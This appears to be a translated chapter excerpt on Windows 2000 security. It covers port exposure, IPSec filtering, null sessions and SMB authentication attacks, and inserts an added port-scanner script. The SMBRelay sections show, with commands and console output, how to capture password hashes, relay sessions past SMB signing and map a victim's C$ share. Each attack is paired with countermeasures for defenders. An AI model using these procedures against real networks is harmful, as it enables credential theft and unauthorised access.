
http://itlab.com.vn

For a more detailed analysis of Windows 2000 security weaknesses and how to fix them, including the latest IIS, SQL and Terminal Services issues, get a copy of Hacking Exposed Windows 2000 (Osborne/McGraw-Hill, 2001).

FOOTPRINTING

As we learned in Chapter 1, most attackers begin by trying to gather as much information as possible without actually touching the target host. The primary source of footprinting information is the Domain Name System (DNS), an Internet-standard protocol that maps host IP addresses to easily remembered names such as www.hackingexposed.com.

DNS Zone Transfers


Popularity: 5  Simplicity: 9  Impact: 2  Risk Rating: 5

Because Windows 2000 Active Directory is built on DNS, Microsoft has substantially upgraded the Windows 2000 DNS server implementation to meet AD's needs, and vice versa. It is therefore an excellent source of footprinting information; so good, in fact, that by default it offers zone transfers to any remote host. See Chapter 3 for details.

Disabling Zone Transfers


Fortunately, the Windows 2000 DNS implementation also allows zone transfers to be restricted, as discussed in Chapter 3.

SCANNING

Windows 2000 listens on a matrix of ports, many of which are new since NT4. Table 6-1 lists selected ports listening on a default Windows 2000 domain controller (DC). Each of these services is a potential entry point into the system.


Port          Service
TCP 25        SMTP
TCP 21        FTP
TCP/UDP 53    DNS
TCP 80        WWW
TCP/UDP 88    Kerberos
TCP 135       RPC/DCE Endpoint Mapper
UDP 137       NetBIOS Name Service
UDP 138       NetBIOS Datagram Service
TCP 139       NetBIOS Session Service
TCP/UDP 389   LDAP
TCP 443       HTTP over SSL/TLS
TCP/UDP 445   Microsoft SMB/CIFS
TCP/UDP 464   Kerberos kpasswd
UDP 500       Internet Key Exchange, IKE (IPSec)
TCP 593       HTTP RPC Endpoint Mapper
TCP 636       LDAP over SSL/TLS
TCP 3268      AD Global Catalog
TCP 3269      AD Global Catalog over SSL
TCP 3389      Windows Terminal Server

Table 6-1: Selected listening ports on a Windows 2000 domain controller (default installation)
TIP: A complete list of the TCP and UDP ports used by Microsoft services is in the Windows 2000 Resource Kit. Look for it at http://www.microsoft.com/Windows2000/techinfo/reskit/samplechapters/default.asp.
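The following scanner is an added example (not from the book) that checks a host for the TCP ports of Table 6-1 with a plain connect scan, reporting each as open, closed (connection refused) or filtered (no reply, which is what a host-level filter such as the IPSec filters discussed later looks like). The port-to-service map is transcribed from the table; the UDP-only entries (137, 138, 500) are listed but not probed, since a TCP connect cannot test them. The default target of 127.0.0.1 is only a placeholder.

```python
import socket
import sys
from concurrent.futures import ThreadPoolExecutor

# TCP entries transcribed from Table 6-1; UDP-only entries are kept apart
# because a connect scan cannot probe them.
DC_TCP_PORTS = {
    21: "FTP", 25: "SMTP", 53: "DNS", 80: "WWW", 88: "Kerberos",
    135: "RPC/DCE Endpoint Mapper", 139: "NetBIOS Session Service",
    389: "LDAP", 443: "HTTP over SSL/TLS", 445: "Microsoft SMB/CIFS",
    464: "Kerberos kpasswd", 593: "HTTP RPC Endpoint Mapper",
    636: "LDAP over SSL/TLS", 3268: "AD Global Catalog",
    3269: "AD Global Catalog over SSL", 3389: "Windows Terminal Server",
}
DC_UDP_ONLY = {137: "NetBIOS Name Service", 138: "NetBIOS Datagram Service",
               500: "Internet Key Exchange (IPSec)"}


def probe_tcp(host, port, timeout=1.0):
    """Full connect to one port: 'open', 'closed' (RST came back) or 'filtered' (no reply)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except (socket.timeout, OSError):
        return "filtered"   # silent drop: typical of an IPSec or TCP/IP filter on the host
    finally:
        sock.close()


def scan_dc(host, ports=None, timeout=1.0, workers=32):
    """Connect-scan the Table 6-1 TCP ports (or a custom set); returns {port: (service, state)}."""
    ports = sorted(DC_TCP_PORTS if ports is None else ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe_tcp(host, p, timeout), ports))
    return {p: (DC_TCP_PORTS.get(p, "unlisted"), s) for p, s in zip(ports, states)}


def exposed_ports(result):
    """Ports that accepted a connection: each one is an entry point that has to be justified."""
    return [p for p, (_, state) in sorted(result.items()) if state == "open"]


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"   # placeholder target
    for port, (service, state) in sorted(scan_dc(target).items()):
        print(f"TCP {port:5d}  {service:32s} {state}")
    for port, service in sorted(DC_UDP_ONLY.items()):
        print(f"UDP {port:5d}  {service:32s} needs a UDP probe")
```

Run it against a freshly promoted DC before and after applying the countermeasures below; anything still reported as open on an external interface is the list you have to defend.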

Countermeasures: Disable Services and Block Ports

The best way to block attacks of any kind is to block access to these services, at the network or at the host. Network perimeter access control devices (switches, routers, firewalls and so on) should be configured to deny all attempts to connect to any of the ports listed here that cannot be turned off. (The standard practice is to deny all protocols to the hosts and then selectively enable only the services each host requires.) In particular, on a domain controller none of these ports should be reachable from outside the network perimeter, and very few should be reachable from the internal, trusted network segment. Two reasons: in Chapter 3 we saw how users can connect to LDAP (TCP 389) and the Global Catalog ports and dump host data; and the NetBIOS Session Service, TCP 139, also introduced in Chapter 3, is one of the largest sources of information leakage and potential compromise


on NT. Most of the tools we introduced in Chapter 5 work exclusively over NetBIOS connections. Windows 2000 data can be dumped in exactly the same way over TCP 445. Note: Be sure to read the section "Disabling NetBIOS/SMB on Windows 2000" at the end of this chapter.

Protecting the listening ports on the individual hosts themselves is also good practice. Defense in depth makes the attacker's job much harder. Long-standing advice in this area is to shut down all unnecessary services by running services.msc and disabling those that are not needed. Be especially vigilant with Windows 2000 domain controllers. When a Server or Advanced Server is promoted to domain controller with dcpromo.exe, Active Directory, DNS and a DHCP server are installed, opening additional ports. DCs are the most critical devices on the network and should be deployed sparingly. Do not use a domain controller as a platform for applications or for file and print services. Minimalism is always the first principle of security.

To restrict access to ports on the host side, the classic fallback, TCP/IP Filters, is still present under Network and Dial-up Connections | Properties of the appropriate connection | Internet Protocol (TCP/IP) Properties | Advanced | Options tab | TCP/IP filtering properties. Its inherent shortcomings remain, however. TCP/IP filtering applies to all adapters. It blocks the inbound half of legitimate outbound connections (preventing web browsing from the system), and it requires a reboot before it takes effect. Caution: Our testing on Windows 2000 showed that TCP/IP filtering does not block ICMP echo requests (IP protocol 1) even when IP protocols 6 (TCP) and 17 (UDP) are the only ones permitted.

IPSec Filters


A better solution is to use IPSec filters to filter ports on the host. These filters are a side benefit of Windows 2000's new IPSec support, and were used to great effect by the designers of Windows2000test.com and the Openhack networks. IPSec filters process packets right in the network stack and silently discard any packet received on an interface that does not match the filter characteristics. Unlike TCP/IP filters, IPSec filters can be applied to individual interfaces, and they block ICMP completely (although they cannot block specific ICMP subtypes such as echo, echo reply or timestamp). IPSec filters do not require a reboot (although changes to the filters will break existing IPSec connections). They are mainly a server solution, not a personal-firewall trick for workstations, because, like TCP/IP filters, they block the inbound half of legitimate outbound connections (unless all ports are allowed through). You can create IPSec filters with the Administrative Tools | Local Security Policy applet (secpol.msc). In the GUI, right-click the IPSec Policies On Local Machine node in the left pane and choose Manage IP Filter Lists And Filter Actions.

We recommend the command-line utility ipsecpol.exe for managing IPSec filters. It lends itself to scripting, and it is easier to use than the cumbersome, many-layered IPSec policy management GUI. Ipsecpol.exe ships with the Windows 2000 Resource Kit and with the Windows 2000 Internet Server Security Configuration Tool at http://www.microsoft.com/technet/security/tools.asp. The following commands allow only port 80 to be reached on a host:

ipsecpol \\computername -w REG -p Web -o
ipsecpol \\computername -x -w REG -p Web -r BlockAll -n BLOCK -f 0+*
ipsecpol \\computername -x -w REG -p Web -r OkHTTP -n PASS -f 0:80+*::TCP

The last two commands create an IPSec policy named Web containing two filter rules: one named BlockAll, which blocks all protocols to and from this host and all other hosts, and one named OkHTTP, which permits traffic on port 80 to and from this host and all other hosts. If you want to allow ping or other ICMP (we recommend against it unless it is truly necessary), you can add this rule to the Web policy:

ipsecpol \\computername -x -w REG -p Web -r OkICMP -n PASS -f 0+*:ICMP

This example applies the policy to all addresses, but you can just as easily name a single IP address in the -f switch to focus the effect on one interface. Port scans against a system configured as in the example above show only port 80 open.


When the policy is deactivated, all the ports are easily reachable again. Each argument used in this example is described in Table 6-2. (For a full description of ipsecpol's features, run ipsecpol -?, on which Table 6-2 is also based.)

Argument       Description

-w REG         Puts ipsecpol in static mode, which writes the policy to a persistent store (as opposed to the default dynamic mode, whose policies remain in effect only while the Policy Agent service is running; a rootkit could kill it). The REG parameter writes the policy to the Registry and is appropriate for hosts that are not domain members. (The alternative, DS, writes it to the directory.)

-p             Specifies an arbitrary name (Web, in the example) for the policy. If a policy of that name already exists, the rule is added to it. For example, the OkHTTP rule is added to the Web policy by the third command.

-r             Specifies an arbitrary name for the rule; it replaces any existing rule of the same name in the policy.

-n             In static mode, the NegotiationPolicyList option accepts three special values: BLOCK, PASS and INPASS (described next).

BLOCK          Ignores the rest of the NegotiationPolicyList and makes all the filters blocking filters. Equivalent to selecting the Block radio button in the IPSec management UI.

PASS           Ignores the rest of the NegotiationPolicyList and makes all the filters pass-through filters. Equivalent to selecting the Permit radio button in the UI.

INPASS         Equivalent to checking the Allow Unsecured Communication, But Always Respond Using IPSEC box in the UI.

-f FilterList  FilterList is one or more space-separated filter specifications (filterspecs) of the form A.B.C.D/mask:port=A.B.C.D/mask:port:IP protocol, where the source address is always to the left of the = and the destination address to the right. If the = is replaced by a +, two mirrored filters are created, one in each direction. The mask and port parts are optional; if omitted, Any port and the mask 255.255.255.255 are used. The A.B.C.D address may be replaced by 0 (the local system's address), * (any address) or a DNS name (note: multiple resolutions are ignored). The IP protocol (for example, ICMP) is optional; if omitted, Any protocol is assumed. If a protocol is specified, it must be immediately preceded by a port or by ::.

-x             (OPTIONAL) Sets the policy active in the LOCAL registry store. (Note that we use this argument when defining the first rule, to activate the Web policy; the switch appears to work only when applied while creating the first filter of a policy.)

-y             (OPTIONAL) Sets the policy inactive in the LOCAL registry store.

-o             (OPTIONAL) Deletes the policy specified by -p. (Note: this argument deletes every part of the specified policy; do not use it if other policies point at objects within that policy.)

Table 6-2: ipsecpol arguments used to filter traffic to a Windows 2000 host

Note that by default IPSec filters do not block broadcast, multicast, QoS RSVP, Internet Key Exchange (IKE, UDP 500) or Kerberos (TCP/UDP 88) traffic (see http://support.microsoft.com/support/kb/articles/Q253/1/69.asp for details on these services and how they relate to IPSec in Windows 2000). Service Pack 1 added a Registry setting that lets you remove the Kerberos exemption by turning off the IPSec driver's default exemption rule:

HKLM\SYSTEM\CurrentControlSet\Services\IPSEC\NoDefaultExempt
Type: DWORD   Max: 1   Min: 0   Default: 0
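The filterspec syntax of Table 6-2 is easy to get subtly wrong, so here is an added example (not code from the book or from ipsecpol) that parses filterspecs exactly as the table describes them (0 for the local address, * for any, a missing mask or port meaning a single host or Any port, + producing the mirrored pair, and a protocol only after a port or ::) and then evaluates packets against the BlockAll/OkHTTP policy. Evaluation follows the simplified model the text uses, with the most recently added rule on top; the real IPSec driver weights filters by specificity, so this is a model of the text's point, not of the driver. DNS names in filterspecs are not resolved here.

```python
import ipaddress
from collections import namedtuple

ANY, LOCAL = "*", "0"
Filter = namedtuple("Filter", "src sport dst dport proto")
Rule = namedtuple("Rule", "name action filters")      # action: BLOCK or PASS


def _endpoint(spec):
    """'A.B.C.D/mask:port' -> (addr, port); addr is '0', '*' or an ip_network."""
    addr, _, port = spec.partition(":")
    port = int(port) if port else ANY                 # missing port = Any port
    if addr in (LOCAL, ANY):
        return addr, port
    if "/" not in addr:
        addr += "/255.255.255.255"                    # missing mask = single host
    return ipaddress.ip_network(addr, strict=False), port


def parse_filterspec(spec):
    """Expand one filterspec into the Filter objects ipsecpol would create.

    '=' gives one filter, '+' the mirrored pair. A trailing protocol must follow
    a port ('*:80:TCP') or '::' ('*::TCP'); DNS names are not resolved here.
    """
    mirrored = "+" in spec
    left, right = spec.replace("+", "=").split("=", 1)
    parts = right.split(":")
    proto = ANY
    if len(parts) > 1 and parts[-1] and not parts[-1].isdigit():
        proto = parts.pop().upper()
    src, sport = _endpoint(left)
    dst, dport = _endpoint(":".join(parts[:2]))
    flt = Filter(src, sport, dst, dport, proto)
    return [flt, Filter(dst, dport, src, sport, proto)] if mirrored else [flt]


def _addr_match(pattern, ip, local_ip):
    if pattern == ANY:
        return True
    if pattern == LOCAL:
        return ip == local_ip
    return ipaddress.ip_address(ip) in pattern


def filter_matches(flt, pkt, local_ip):
    """pkt = (src_ip, sport, dst_ip, dport, proto); use ANY for the ports of ICMP."""
    src, sport, dst, dport, proto = pkt
    return (_addr_match(flt.src, src, local_ip) and _addr_match(flt.dst, dst, local_ip)
            and flt.sport in (ANY, sport) and flt.dport in (ANY, dport)
            and flt.proto in (ANY, proto.upper()))


def add_rule(policy, name, action, filterspec):
    """Equivalent of 'ipsecpol -p <policy> -r <name> -n <action> -f <filterspec>'."""
    policy[:] = [r for r in policy if r.name != name]   # -r replaces a same-named rule
    policy.append(Rule(name, action.upper(), parse_filterspec(filterspec)))
    return policy


def decide(policy, pkt, local_ip):
    """Text's model: the newest rule sits at the top of the list and is checked first."""
    for rule in reversed(policy):
        if any(filter_matches(f, pkt, local_ip) for f in rule.filters):
            return rule.action
    return "PASS"                                     # nothing matched: IPSec leaves it alone


def web_policy():
    """The BlockAll and OkHTTP rules from the text, added in the order shown there."""
    policy = []
    add_rule(policy, "BlockAll", "BLOCK", "0+*")
    add_rule(policy, "OkHTTP", "PASS", "0:80+*::TCP")
    return policy


if __name__ == "__main__":
    me = "192.168.234.34"   # assumed address of the filtered host
    for pkt in [("10.1.1.5", 1025, me, 80, "tcp"), ("10.1.1.5", 1025, me, 139, "tcp"),
                ("10.1.1.5", ANY, me, ANY, "icmp")]:
        print(pkt[3], pkt[4], "->", decide(web_policy(), pkt, me))
```

Adding OkHTTP before BlockAll puts the blocking rule on top and silently closes port 80 as well, which is the ordering trap the text warns about; checking a policy this way before pushing it with ipsecpol is cheaper than discovering the mistake with a port scan.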


Only IKE, multicast and broadcast remain exempt, and they are unaffected by this Registry setting. Kerberos and RSVP traffic are no longer exempt once this value is set to 1. Note: Thanks to Michael Howard and William Dixon of Microsoft for their advice on IPSec.

Because of its powerful command-line syntax, ipsecpol can be finicky. In the previous example we saw that the filter list is evaluated from the top down (assuming that each new filter is written by ipsecpol at the top of the list). Simply changing the order in which the rules are applied with ipsecpol results in incomplete filtering, which is a troublesome problem. Also, there appears to be no way to specify port ranges in the filterspec syntax for either source or destination. So although IPSec filters are a significant improvement over TCP/IP port filtering, use them carefully and make sure you open only the ports that are needed.

Some further advice gleaned from extensive testing with ipsecpol: If you want to remove a policy, it sometimes helps to use the -y argument to deactivate it before or after deleting it with the -o switch. We have seen cases where even a deleted policy remained in effect until it was completely deactivated. Use either the ipsecpol command-line tool or the GUI exclusively when changing policies. When we created policies with ipsecpol and then edited them through the GUI, conflicts arose that left large holes in the protection. Make sure you delete all unused filter rules to avoid conflicts. This is one area where the GUI is genuinely useful, in showing the existing filters and policies.

ENUMERATION

Chapter 3 showed how forthcoming NT4 is when actively probed for information such as user names, file shares and the like. In that chapter we also saw how the NetBIOS service hands out data to anonymous users over dangerous null sessions, and how Active Directory is a gold mine of information for unauthenticated attackers. We will not describe those attacks again here, but note that Windows 2000 provides some new measures to address the NetBIOS and SMB problems. The ability to operate without relying on NetBIOS is perhaps one of the most important changes in Windows 2000.
As mentioned in Chapter 3, NetBIOS over TCP/IP can be disabled via Properties of the appropriate Network and Dial-up Connection | Properties of Internet Protocol (TCP/IP) | Advanced button | WINS tab | Disable NetBIOS over TCP/IP. What most people overlook, however, is that although the dependence on the NetBIOS transport can be removed this way, Windows 2000 can still use SMB over TCP (port 445) for Windows file sharing (see Table 6-1). This is a trap Microsoft has laid for naive users who think that disabling NetBIOS over TCP/IP (through the LAN connection properties, WINS tab) fixes the null session problem: it does not. Disabling NetBIOS over TCP/IP affects only TCP 139, not 445. It looks almost as if the null session problem has been solved, because attackers using clients older than NT4 Service Pack 6a cannot connect to port 445; but those who can are able to do everything described in detail in Chapter 3, such as enumerating users and running user2sid/sid2user. Don't be fooled by superficial UI changes!

Disabling NetBIOS/SMB on Windows 2000

Fortunately, there is a way to disable port 445. Like disabling port 139 on NT4, however, it requires digging into the bindings of the adapters. First you have to find the bindings tab, which has been moved to a location no one would guess (an unpleasant move on the UI front). The bindings tab appears when you open the Network and Dial-up Connections applet and select Advanced | Advanced Settings, as shown in the following figure:

By unchecking File And Printer Sharing For Microsoft Networks, as illustrated in Figure 6-1, null sessions are disabled on both ports 139 and 445 (along with file and printer sharing). No reboot is required. (Microsoft deserves credit for finally allowing many network changes to take effect without a reboot.) This is currently the best way to configure the external interfaces of an Internet-connected server. Note: TCP 139 will still appear in port scans, even after this setting is made. The port will no longer yield any NetBIOS-related information, however.


Remember, too, that IPSec filters can be used to restrict access to NetBIOS or SMB.

Figure 6-1: Disabling NetBIOS and SMB/CIFS file and printer sharing (blocking null sessions) using the Network and Dial-up Connections Advanced Settings window
RestrictAnonymous and Windows 2000

We saw in Chapter 3 how the RestrictAnonymous Registry setting is used to block the disclosure of sensitive information over null sessions. In Windows 2000, RestrictAnonymous is configured under Security Policy | Local Policies | Security Options.

In Chapter 3 we also saw that RestrictAnonymous can be bypassed. New in Windows 2000, RestrictAnonymous can be given a stricter setting that blocks null sessions completely. "No Access Without Explicit Anonymous Permissions" corresponds to setting RestrictAnonymous = 2 in the Windows 2000 Registry. Setting RestrictAnonymous = 2 can cause Windows connectivity problems; see KB article Q246216 at http://search.support.microsoft.com for details.
PENETRATION

Out of the box, Windows 2000 is vulnerable to all the same remote attacks as NT4, as we will see in the following sections.

NetBIOS-SMB Password Guessing
Tools such as SMBGrind, introduced in Chapter 5, are still effective at guessing share passwords on Windows 2000 systems. As we have seen, if NetBIOS or SMB/CIFS is enabled and the attacker's client can speak SMB, password guessing remains one of the greatest threats to Windows 2000 systems. Note: As Luke Leighton of Samba has pointed out many times on http://samba.org, NetBIOS and SMB should not be confused. NetBIOS is a transport, whereas SMB is a file-sharing protocol that binds to a NetBIOS-over-TCP (NBT) name of the form SERVER_NAME<20>, much as any ordinary server binds to a TCP port. SMB bound to TCP 445 is an entirely separate matter and does not involve NetBIOS at all.
Eavesdropping on Password Hashes

The L0phtcrack SMB packet capture utility introduced in Chapter 5 still works for capturing and cracking the LM responses exchanged between downlevel clients (NT4 and Win9x) and Windows 2000 servers. Windows 2000's Kerberos logon architecture is not easily defeated by such attacks, but it is used only when a Windows 2000 domain controller is available to act as the Kerberos KDC. Windows 2000's Kerberos implementation is also designed so that authentication falls back to LM/NTLM when Kerberos is unavailable, so Windows 2000 is easily attacked in a standalone configuration. Note: Even domain members do not use Kerberos to reach resources if IP addresses are used in place of host names.

Redirecting SMB Logon to the Attacker

Eavesdropping on LM responses becomes much easier if the attacker can trick the victim into attempting Windows authentication against a server of the attacker's choosing. This is also useful in switched environments, because it draws the SMB sessions to the attacker's system regardless of the network topology. Targeting individual users is an effective approach as well. The basic trick was introduced in one of the first L0phtcrack releases: send the victim a message with an embedded hyperlink to a fraudulent SMB server. The victim receives the message, the hyperlink is followed (manually or automatically), and the client unwittingly sends the user's SMB credentials over the network. Such links are easily disguised and typically require little user interaction, because Windows will automatically attempt to log in as the current user if no other authentication information is explicitly supplied. From a security standpoint, this is probably one of the most debilitating behaviors in Windows. We demonstrate an example of this attack in Chapter 16.


SMBRelay

In May 2001, Sir Dystic of the Cult of the Dead Cow released a tool called SMBRelay (http://pr0n.newhackcity.net/~sd/windoze.html). The announcement was greeted with great fanfare. The Register hyped the tool as "devastating WinNT/2K security", apparently unaware that the weaknesses in LM authentication had long been known by then. SMBRelay is essentially an SMB server that can harvest user names and password hashes from incoming SMB traffic. As its name implies, SMBRelay can act not only as an SMB endpoint but also, in certain circumstances, mount man-in-the-middle attacks. We look first at SMBRelay's use as a simple SMB server, and then at its MITM (man-in-the-middle) capability.

Capturing SMB Credentials Using SMBRelay


Popularity: 2  Simplicity: 2  Impact: 7  Risk Rating: 4

Setting up a fraudulent SMBRelay server is quite simple. The first step is to run SMBRelay with the enumerate switch to identify a suitable physical interface on which to run the listener:

C:\>smbrelay /E
SMBRelay v0.992 - TCP (NetBT) level SMB man-in-the-middle relay attack
Copyright 2001: Sir Dystic, Cult of the Dead Cow
Send complaints, ideas and donations to sirdystic@cultdeadcow.com
[2] ETHERNET CSMACD - 3Com 10/100 Mini PCI Ethernet Adapter
[1] SOFTWARE LOOPBACK - MS TCP Loopback interface

In this example the interface with index 2 is the appropriate choice, because it is a physical card that can be reached from a remote system. (The loopback adapter is reachable only from the local host.) With multiple adapters the choices obviously multiply, but we concentrate on the simplest case here and use the index 2 adapter in what follows.


Running the fraudulent server on Windows 2000 takes some finesse, because the operating system will not let other processes bind the SMB port TCP 139 while it is using that port itself. One workaround is to disable TCP 139 temporarily by selecting Disable NetBIOS over TCP/IP: open Properties of the appropriate Local Area Connection, then Properties of Internet Protocol (TCP/IP), click the Advanced button and select the appropriate radio button on the WINS tab, as described in Chapter 4. Once this is done, SMBRelay can bind TCP 139. If disabling TCP 139 is not an option, the attacker must create a virtual IP address on which to run the fraudulent SMB server. Conveniently, SMBRelay can set up and tear down virtual IP addresses automatically with a simple command-line switch, /L+ ip_address. We obtained inconsistent results with the /L switch on Windows 2000, however, and it is probably better to disable TCP 139 as explained above than to use /L. One more detail to keep in mind when using SMBRelay on Windows 2000: if a Windows 2000 SMB client cannot connect on TCP 139, it tries TCP 445 next, as we saw earlier in this chapter. To keep a Windows 2000 client from bypassing the fraudulent SMBRelay server listening on TCP 139, TCP 445 must be blocked or disabled on the fraudulent server. Since the only way to disable TCP 445 also affects TCP 139, the best option is to block TCP 445 with an IPSec filter, as described earlier. The following example shows SMBRelay running on a Windows 2000 host, assuming TCP 139 has been disabled and TCP 445 is blocked by an IPSec filter. Here is how to start SMBRelay on Windows 2000, assuming that interface index 2 is used for both the local listener and the relay address, and that the fraudulent server listens on the interface's current IP address:

C:\>smbrelay /IL 2 /IR 2
SMBRelay v0.992 - TCP (NetBT) level SMB man-in-the-middle relay attack
Copyright 2001: Sir Dystic, Cult of the Dead Cow
Send complaints, ideas and donations to sirdystic@cultdeadcow.com
Using relay adapter index 2: 3Com EtherLink PCI
Bound to port 139 on address 192.168.234.34

SMBRelay then begins accepting SMB session negotiations. When a victim client successfully negotiates an SMB session, this is what SMBRelay does:


Connection from 192.168.234.44:1526
Request type: Session Request 72 bytes
Source name: CAESARS <00>
Target name: *SMBSERVER <20>
Setting target name to source name and source name to CDC4EVER
Response: Positive Session Response 4 bytes
Request type: Session Message 137 bytes
SMB_COM_NEGOTIATE
Response: Session Message 119 bytes
Challenge (8 bytes): 952B49767C1D123
Request type: Session Message 298 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case insensitive password: 4050C79D024AE0F391DF9A8A5BD5F3AE5E8024C5B9489BF6
Case sensitive password: 544FEA21F6D8E854F4C3B4ADF6A6A5D85F9CEBAB966EEB
Username: Administrator
Domain: CAESARS-TS
OS: Windows 2000 2195
Lanman type: Windows 2000 5.0
???:
Response: Session Message 156 bytes
OS: Windows 5.0
Lanman type: Windows 2000 LAN Manager
Domain: CAESARS-TS
Password hash written to disk
Connected?
Relay IP address added to interface 2
Bound to port 139 on address 192.1.1.1
relaying for host CAESARS 192.168.234.44

As you can see, both the LM (case insensitive) and NTLM (case sensitive) password responses are captured and written to the file hashes.txt in the current working directory. That file can be imported into L0phtcrack 2.5x and attacked. Note: Because the file formats of L0phtcrack 3 and L0phtcrack 2.52 differ, the data captured by SMBRelay cannot be imported directly into LC3.


More dangerous still, the attacker's system can now reach the client simply by connecting to the relay address, which defaults to 192.1.1.1. Here is what that looks like:

C:\>net use * \\192.1.1.1\c$
Drive E: is now connected to \\192.168.234.252\c$
The command completed successfully.

C:\>dir e:
Volume in drive G has no label
Volume Serial Number is 44F0-BFDD
Directory of G:\
12/02/2000 10:51p <DIR> Documents and Settings
12/02/2000 10:08p <DIR> Inetpub
05/25/2001 03:47a <DIR> Program Files
05/25/2001 03:47a <DIR> WINNT
0 File(s) 0 bytes
4 Dir(s) 44,405,624,832 bytes free

On the Windows client that connected to the SMBRelay server in the previous example, this is what we see. First, the original net use command appears to fail with system error 64. A subsequent net use reports no drives mapped. net session, however, reveals that the client is unknowingly connected to a machine with a spoofed name (CDC4EVER, which SMBRelay sets by default unless the /S name parameter is used to change it).

C:\client>net use \\192.168.234.34\ipc$ * /u:Administrator
Type the password for \\192.168.234.34\ipc$:
System error 64 has occurred.
The specified network name is no longer available.

C:\client>net use
New connections will not be remembered.
There are no entries in the list.

C:\client>net session
Computer        User name        Client Type      Opens   Idle time
------------------------------------------------------------------------
\\CDC4EVER      ADMINISTRATOR    Owned by cDc     0       00:00:27
The command completed successfully.


Some problems commonly arise when using SMBRelay. Once a connection attempt from a given victim IP address has failed, every subsequent attempt from that address produces an error. (This is by design, as the documentation notes.) You may also run into this when the initial negotiation succeeded but you receive a message such as: Login failure code: 0xC000006D. Restarting SMBRelay clears these problems (just press CTRL-C to stop it). You may also see bogus connections from the loopback adapter (169.254.9.119); these can safely be ignored. ARP redirection/cache poisoning can also be used to steer clients to a fraudulent SMB server; see Chapter 10.

SMB Redirection Countermeasures

In theory, SMBRelay is very hard to defend against. Because it needs the ability to negotiate all the different LM/NTLM authentication dialects, it should be able to capture any authentication directed at it. Digitally signing SMB communications can be used to defeat SMBRelay's man-in-the-middle attacks, but it does not defeat the rogue server attack, because SMBRelay can negotiate the secure channel down with victim clients.

SMB Man-in-the-Middle (MITM) Attacks

Popularity: 2  Simplicity: 2  Impact: 8  Risk Rating: 4

SMBRelay's man-in-the-middle attacks were the main reason for the hype when the tool was released. Although the concept of SMB MITM attacks was quite old by the time SMBRelay came out, it was the first widely available tool to automate the attack. An example of a MITM setup with SMBRelay is shown in Figure 6-2. In this example the attacker sets up a fraudulent server at 192.168.234.251 (with NetBIOS over TCP disabled; this is the real address of the attacker's MITM machine), a relay address of 192.168.234.252 using /R, and a target server address of 192.168.234.34 using /T.


Figure 6-2: The SMBRelay MITM setup

C:\>smbrelay /IL 2 /IR 2 /R 192.168.234.252 /T 192.168.234.34
Bound to port 139 on address 192.168.234.251

Next, a victim client at 192.168.234.220 connects to the fraudulent server address, believing it is talking to the target.

Connection from 192.168.234.220:1043
Request type: Session Request 72 bytes
Source name: GW2KNT4 <00>
Target name: *SMBSERVER <20>
Setting target name to source name and source name to CDC4EVER
Response: Positive Session Response 4 bytes
Request type: Session Message 174 bytes
SMB_COM_NEGOTIATE
Response: Session Message 95 bytes
Challenge (8 bytes): 1DEDB6BF7973DD06
Security signatures required by server*** This may not work
Disabling security signatures

Note that the target server has been configured to require signed SMB communications, and that SMBRelay disables the signatures.

Request type: Session Message 286 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case insensitive password: A4DA35F982CBE17FA2BBB952CBC01382C210FF29461A71F1
Case sensitive password: F0C2D1CA8895BD26C7C7E8CAA54E10F1E1203DAD4782FB95
Username: Administrator
Domain: NT4DOM
OS: Windows NT 1381


Lanman type:
???: Windows NT 4.0
Response: Session Message 144 bytes
OS: Windows NT 4.0
Lanman type: NT LAN Manager 4.0
Domain: NT4DOM
Password hash written to disk
Connected?
Relay IP address added to interface 2
Bound to port 139 on address 192.168.234.252
Relaying for host GW2KNT4 192.168.234.220

At this point the attacker has successfully inserted himself into the SMB stream between the victim client and the target server, and has extracted the client's LM and NTLM responses from the challenge-response exchange. Connecting to the relay address gives access to the target server's resources. For example, here the attacker's system maps the C$ share through the relay address:

D:\>net use * \\192.168.234.252\c$
Drive G: is now connected to \\gw2knt4\c$
The command completed successfully.

This is what the connection from the attacker's system looks like on the SMBRelay console:

+++ Relay connection for target GW2KNT4 received from 192.168.234.50:1044
+++ Sent positive session response for relay target GW2KNT4
+++ Sent dialect selection response (7) for target GW2KNT4
+++ Sent SMB session setup response for relay to GW2KNT4

SMBRelay can be unstable and its results are not always entirely consistent, but when it succeeds it is clearly a devastating attack. The man in the middle gains complete access to the target server's resources without lifting a finger. The main difficulty, of course, is first persuading the victim client to authenticate to the MITM server, but we have discussed several ways of solving that problem. One could send the victim client a malicious e-mail message with an embedded hyperlink to the SMBRelay MITM server's address. Or one could mount an ARP poisoning attack against an entire subnet, causing every system on the segment to authenticate through the fraudulent MITM server. ARP redirection/cache poisoning is discussed in Chapter 10.


SMB MITM Countermeasures

The obvious countermeasure to SMBRelay is to configure Windows 2000 to use SMB Signing, now referred to as digitally signing client/server communications. SMB Signing was introduced with Windows NT4 Service Pack 3 and is discussed in KB article Q161372. As the name suggests, setting Windows 2000 to digitally sign client or server communications causes it to cryptographically sign each block of SMB communications. The signature can be checked by a client or server to verify the integrity and authenticity of each block, which theoretically makes SMB server spoofing infeasible (not impossible, depending on the signing algorithm used). By default Windows 2000 is configured as follows:

Digitally sign client communications (when possible): Enabled
Secure channel: Digitally encrypt secure channel data (when possible): Enabled
Secure channel: Digitally sign secure channel data (when possible): Enabled

These settings are found under Security Policy | Local Policies | Security Options. So if a server supports SMB Signing, Windows 2000 will use it. To require SMB Signing, you can optionally enable the following additional parameters in Security Options:

Digitally sign client communications (always): Enabled
Digitally sign server communications (always) (this is what prevents SMBRelay from relaying): Enabled
Secure channel: Digitally encrypt or sign secure channel data (always): Enabled
Secure channel: Require strong (Windows 2000 or later) session key: Enabled

Note that these settings can cause connectivity problems with NT4 systems, even though SMB Signing may work on them. As we have seen, moreover, SMBRelay attempts to disable SMB Signing and may well defeat these settings. Because SMBRelay MITM attacks are essentially legitimate connections, there are no specific log entries to indicate that an attack is under way. On the victim client, connectivity problems may appear when connecting to the fraudulent SMBRelay server, including system error 59, an unexpected network error. Under SMBRelay the connection does in fact succeed, but it is hijacked away from the client by the attacker.
